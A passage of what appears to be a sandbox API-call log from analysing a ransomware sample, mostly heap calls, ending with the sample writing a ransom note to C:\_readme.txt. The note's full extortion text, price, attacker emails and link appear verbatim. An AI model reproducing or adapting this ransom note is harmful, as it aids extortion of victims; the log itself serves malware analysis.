hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.050] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.050] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc2e) returned 0x322cda8 [0056.050] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.050] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x322cda8 | out: hHeap=0x660000) returned 1 [0056.050] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.050] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.050] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0056.050] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.051] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0056.051] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0056.051] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0056.051] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0056.051] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.051] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.051] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.051] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.051] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0056.051] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.051] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0056.051] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.051] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.051] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.051] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.051] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.051] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.051] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.051] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.051] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.051] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.051] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.051] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.051] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.051] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.051] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.051] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.051] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc46) returned 0x322cda8 [0056.051] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.052] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x322cda8 | out: hHeap=0x660000) returned 1 [0056.052] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.052] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.052] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.052] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc2e) returned 0x322cda8 [0056.052] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.052] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x322cda8 | out: hHeap=0x660000) returned 1 [0056.052] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0056.052] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0056.052] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0056.052] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0056.052] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.052] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.052] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.052] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.052] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.052] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc46) returned 0x322cda8 [0056.052] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.052] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x322cda8 | out: hHeap=0x660000) returned 1 [0056.052] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0056.052] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.052] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0056.052] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.052] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.052] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.052] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.052] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.052] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.052] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.052] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.053] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.053] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.053] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.053] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.053] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.053] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.053] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.053] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.053] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc46) returned 0x322cda8 [0056.053] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.053] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x322cda8 | out: hHeap=0x660000) returned 1 [0056.053] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.053] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.053] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0056.053] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0056.053] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0056.053] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0056.053] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.053] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.053] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.053] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.053] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.053] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc46) returned 0x322cda8 [0056.053] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.053] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x322cda8 | out: hHeap=0x660000) returned 1 [0056.053] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0056.053] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.053] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0056.053] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.053] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.053] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.054] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.054] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.054] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.054] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.054] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.054] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.054] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.054] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.054] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.054] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.054] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.054] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.054] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.054] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc46) returned 0x322cda8 [0056.054] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.054] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x322cda8 | out: hHeap=0x660000) returned 1 [0056.054] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.054] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.054] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0056.054] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0056.054] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0056.054] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0056.054] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.054] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.054] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.054] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.054] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.054] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc46) returned 0x322cda8 [0056.054] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.054] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x322cda8 | out: hHeap=0x660000) returned 1 [0056.055] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0056.055] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.055] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.055] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.055] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.055] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.055] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.055] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.055] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.055] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.055] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.055] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.055] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0056.055] PathFindFileNameW (pszPath="") returned="" [0056.055] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75fd0000 [0056.055] GetProcAddress (hModule=0x75fd0000, lpProcName="SHGetFolderPathW") returned 0x76055708 [0056.055] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x800) returned 0x3297a68 [0056.056] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3297a68 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0056.056] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x810) returned 0x9c5d1d0 [0056.056] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ece8 [0056.056] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.056] FreeLibrary (hLibModule=0x75fd0000) returned 1 [0056.061] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ece8 | out: hHeap=0x660000) returned 1 [0056.061] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3297a68 | out: hHeap=0x660000) returned 1 [0056.061] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x806) returned 0x3297a68 [0056.061] PathAppendW (in: pszPath="C:\\", pMore="_readme.txt" | out: pszPath="C:\\_readme.txt") returned 1 [0056.061] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x810) returned 0x9c5d1d0 [0056.061] PathFileExistsW (pszPath="C:\\_readme.txt") returned 0 [0056.062] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x7d00) returned 0x9c82710 [0056.062] lstrcpyW (in: lpString1=0x9c82710, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7cpJN3gq4f\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nrestoredatahelp@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\ngorentos@bitmessage.ch\r\n\r\nYour personal ID:\r\n0181jYgs9f6s" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7cpJN3gq4f\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nrestoredatahelp@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\ngorentos@bitmessage.ch\r\n\r\nYour personal ID:\r\n0181jYgs9f6s") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7cpJN3gq4f\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nrestoredatahelp@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\ngorentos@bitmessage.ch\r\n\r\nYour personal ID:\r\n0181jYgs9f6s" [0056.062] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7cpJN3gq4f\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nrestoredatahelp@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\ngorentos@bitmessage.ch\r\n\r\nYour personal ID:\r\n0181jYgs9f6s", lpString2="x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7cpJN3gq4f\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nrestoredatahelp@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\ngorentos@bitmessage.ch\r\n\r\nYour personal ID:\r\n0181jYgs9f6sx9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7cpJN3gq4f\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nrestoredatahelp@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\ngorentos@bitmessage.ch\r\n\r\nYour personal ID:\r\n0181jYgs9f6sx9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9" [0056.062] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x810) returned 0x9c5da58 [0056.062] CreateFileW (lpFileName="C:\\_readme.txt" (normalized: "c:\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5c8 [0056.064] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8c0) returned 0x3268798 [0056.064] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x85d) returned 0x326aa18 [0056.064] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7cpJN3gq4f\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nrestoredatahelp@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\ngorentos@bitmessage.ch\r\n\r\nYour personal ID:\r\n0181jYgs9f6sx9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9", cchWideChar=-1, lpMultiByteStr=0x326aa18, cbMultiByte=2141, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7cpJN3gq4f\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nrestoredatahelp@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\ngorentos@bitmessage.ch\r\n\r\nYour personal ID:\r\n0181jYgs9f6sx9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9", lpUsedDefaultChar=0x0) returned 1118 [0056.064] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x32acff0 [0056.064] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326aa18 | out: hHeap=0x660000) returned 1 [0056.064] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0056.064] lstrlenA (lpString="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7cpJN3gq4f\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nrestoredatahelp@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\ngorentos@bitmessage.ch\r\n\r\nYour personal ID:\r\n0181jYgs9f6sx9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9") returned 1117 [0056.064] WriteFile (in: hFile=0x5c8, lpBuffer=0x32acff0*, nNumberOfBytesToWrite=0x45d, lpNumberOfBytesWritten=0x9f4fb64, lpOverlapped=0x0 | out: lpBuffer=0x32acff0*, lpNumberOfBytesWritten=0x9f4fb64*=0x45d, lpOverlapped=0x0) returned 1 [0056.066] CloseHandle (hObject=0x5c8) returned 1 [0056.067] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32acff0 | out: hHeap=0x660000) returned 1 [0056.067] HeapFree (in: hHeap=0x660000, 